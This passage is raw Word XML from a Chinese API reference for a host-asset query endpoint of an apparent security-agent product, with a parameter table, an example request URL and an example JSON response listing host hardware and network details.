            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39A220E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3C2746E6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F4F1F35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="096D040E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="364151B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E8E85F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61C68699" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49D7BCD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7474B2C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BFACC31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F783644" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0291AD13" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="182688C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1959208B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B423277" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0596BB07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5936D980" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29A967DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6301E7A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B20806D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08EBCD7D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A13281F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2842D9F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastOnlineTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B0CA19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4445F41A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB26D2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后一次在线时间，yyyy-MM-dd HH:mm:ss - yyyy-MM-dd HH:mm:ss</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F8A1EC4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF6FFC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DBE8ECB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3278C901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC3FB3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机状态，0-在线 1-离线 2-停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="636DF5C7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10CB033F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serialNumber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57484AA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B649614" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CDE3397" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>序列号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C7ACFE7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E868704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/host/linux?page=0&amp;size=50&amp;groups=1,2&amp;lastOnlineTime=2018-04-01 11:00:00 – 2018-04-01 16:00:00&amp;sorts=+ip,-hostname&amp;serialNumber=VMware-56 4d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F683D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C8B59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "internalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"被删除分组",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "tmp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "proxyIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "platform":"Ubuntu 16.04.2 LTS",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "kernelVersion":"4.13.0-26-generic",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "cpu":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "core":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "producer":"GenuineIntel",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "brand":"Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"GenuineIntel 4 Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "loadAvgFifteen": 0.35</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "cpuNum" : NumberInt(2), </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "cpuArch" : "x86_64", </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "clockSpeed" : 2095.082, </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "physicalCoreNum" : 8, </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "logicalCoreNum" : 8</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "memoryUsage":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "memorySize":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "onlineStatus":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentStatus":0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "lastOnlineTime":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "installTime":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentVersion":"3.0.7-3.34.0-RC-Debug-2018-03-30_18-50-07-436",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bashVersion":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bashPluginInstalled":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "offlineDays": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "chargeName": "qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostLocation": "wuhan",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "systemLoad": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "memories": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "type": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "producer": "Not Specified",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "size": 980,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "description": "0.96GB(Not Specified null 0MHZ)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "producerSize": 2048,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "bank": "Not Specified 2.0GB 0MHZ"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "manufacturer": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "productName": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serialNumber": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "networkCards": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "eth0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "mac": "00:50:56:36:35:bb",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv4": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv6": "fe80::250:56ff:fe36:35bb",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "gateway": "192.168.78.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "dnsServer": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "yes"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "netmask": "255.255.255.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "broadcast": "192.168.78.255",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": "1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "lo",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "mac": "00:00:00:00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv4": "127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "ipv6": "::1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "gateway": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "dnsServer": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "192.168.78.2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "netmask": "255.255.255.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "broadcast": "192.168.78.255",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "status": "1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "speed": 1000</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "diskSize": 51200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "diskUsage": 0.6096,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "diskCount": 4</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EAB0AC"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2110"/>
        <w:gridCol w:w="1025"/>
        <w:gridCol w:w="3649"/>
        <w:gridCol w:w="3298"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="7729AAD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A887A13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30BFD83C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AD74B84" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4078D900" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E9B2C36" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="148CE6A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C78A28D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B00E2ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C0E6090" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="49158E7E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61FBDA6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15F75407" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5F4E82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F53B361" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6671B56B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B085429" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6991814F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1A9A6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA32290" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="01538E81" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3349B22C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D4515D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6349AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520E154A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28AA2F76" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
